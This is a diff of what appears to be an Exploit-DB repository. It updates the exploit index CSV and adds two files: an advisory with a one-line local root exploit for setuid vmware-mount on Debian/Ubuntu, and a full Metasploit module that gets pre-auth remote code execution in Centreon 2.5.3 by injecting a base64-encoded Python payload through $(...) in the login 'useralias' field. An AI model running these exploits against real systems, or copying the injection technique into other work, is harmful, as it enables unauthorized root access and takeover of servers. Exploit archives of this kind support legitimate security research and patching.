WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 @@ -33102,7 +33102,7 @@ id,file,description,date,author,platform,type,port 36687,platforms/php/webapps/36687.txt,"CubeCart <= 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h 'path_to_admin/product.php' Cross Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 -36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit",2015-04-09,xort,linux,remote,8000 +36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting",2012-02-10,sonyy,php,webapps,0 @@ -34089,7 +34089,7 @@ id,file,description,date,author,platform,type,port 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0 37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0 37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0 -37760,platforms/windows/local/37760.rb,"PDF Shaper 3.5 - Buffer Overflow",2015-08-12,metacom,windows,local,0 +37760,platforms/windows/local/37760.rb,"PDF Shaper 3.5 - Buffer Overflow (Metasploit)",2015-08-12,metacom,windows,local,0 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,Un_N0n,windows,dos,0 @@ -35087,7 +35087,7 @@ id,file,description,date,author,platform,type,port 38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross Site Scripting and SQL Injection Vulnerabilities",2013-10-21,"Omar Kurt",php,webapps,0 38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 38821,platforms/android/remote/38821.py,"Google Android Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote,0 -38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection",2015-11-28,hland,windows,webapps,8080 +38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,windows,webapps,8080 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 38826,platforms/linux/remote/38826.py,"Linux Kernel <= 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 @@ -35731,7 +35731,7 @@ id,file,description,date,author,platform,type,port 39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection",2016-02-26,"xevil and Blankon33",php,webapps,80 39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0 39500,platforms/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - CSRF",2016-02-26,Sysdream,linux,webapps,443 -39501,platforms/php/webapps/39501.txt,"Centreon <= 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0 +39501,platforms/php/webapps/39501.txt,"Centreon 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0 39502,platforms/linux/dos/39502.py,"GpicView 0.2.5 - Crash PoC",2016-02-26,"David Silveiro",linux,dos,0 39503,platforms/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos,0 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0 @@ -35925,7 +35925,7 @@ id,file,description,date,author,platform,type,port 39712,platforms/win_x86-64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0 39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80 -39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443 +39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 @@ -36027,7 +36027,7 @@ id,file,description,date,author,platform,type,port 39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0 39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0 -39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure",2016-05-17,"Karn Ganeshen",multiple,webapps,0 +39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0 39823,platforms/hardware/remote/39823.py,"Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow",2016-05-17,"Exodus Intelligence",hardware,remote,0 39824,platforms/multiple/dos/39824.txt,"Adobe Flash - JXR Processing Out-of-Bounds Read",2016-05-17,"Google Security Research",multiple,dos,0 39825,platforms/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",multiple,dos,0 @@ -36211,7 +36211,7 @@ id,file,description,date,author,platform,type,port 40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Stored Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80 40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80 40017,platforms/windows/local/40017.py,"MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0 -40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0 +40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - (.m3u) Buffer Overflow Exploit (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0 40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80 40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0 40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80 @@ -36320,3 +36320,5 @@ id,file,description,date,author,platform,type,port 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 +40169,platforms/linux/local/40169.txt,"VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 +40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 diff --git a/platforms/linux/local/40169.txt b/platforms/linux/local/40169.txt new file mode 100755 index 000000000..0fd8ad54d --- /dev/null +++ b/platforms/linux/local/40169.txt @@ -0,0 +1,57 @@ +On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid. + + 488 + 489 if (running_setuid && privileged_mode == 0) + 490 disable_priv_mode (); + 491 + +Where disable_priv_mode is defined as: + +1202 void +1203 disable_priv_mode () +1204 { +1205 setuid (current_user.uid); +1206 setgid (current_user.gid); +1207 current_user.euid = current_user.uid; +1208 current_user.egid = current_user.gid; +1209 } + +Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5: + + 307 /* Turning off -p? */ + 308 if (f == FPRIVILEGED && oldval && !newval) { + 309 #ifdef OS2 + 310 ; + 311 #else /* OS2 */ + 312 setuid(ksheuid = getuid()); + 313 setgid(getgid()); + 314 #endif /* OS2 */ + 315 } else if (f == FPOSIX && newval) { + + +This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file. + +However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash: + +http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff + +A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed: + +$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount +# whoami +root + +It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?). + +http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586 + +VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this: + +# chmod u-s /usr/bin/vmware-mount + +Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases. + +In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-) + +P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site. +P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested. \ No newline at end of file diff --git a/platforms/python/remote/40170.rb b/platforms/python/remote/40170.rb new file mode 100755 index 000000000..d5b2c3d9b --- /dev/null +++ b/platforms/python/remote/40170.rb @@ -0,0 +1,89 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Centreon Web Useralias Command Execution', + 'Description' => %q( + Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL + errors. This functionality can be abused for arbitrary code + execution, and can be triggered via the login screen prior to + authentication. + ), + 'Author' => + [ + 'h00die ', # module + 'Nicolas CHATELAIN ' # discovery + ], + 'References' => + [ + [ 'EDB', '39501' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['python'], + 'Privileged' => false, + 'Arch' => ARCH_PYTHON, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 26 2016' + ) + ) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/']) + ], self.class + ) + end + + def check + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'method' => 'GET' + ) + /LoginInvitVersion">
[\s]+(?[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body + + if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3') + vprint_good("Version Detected: #{version}") + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + vprint_status('Sending malicious login') + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'method' => 'POST', + 'vars_post' => + { + 'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\", + 'password' => Rex::Text.rand_text_alpha(5) + } + ) + + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file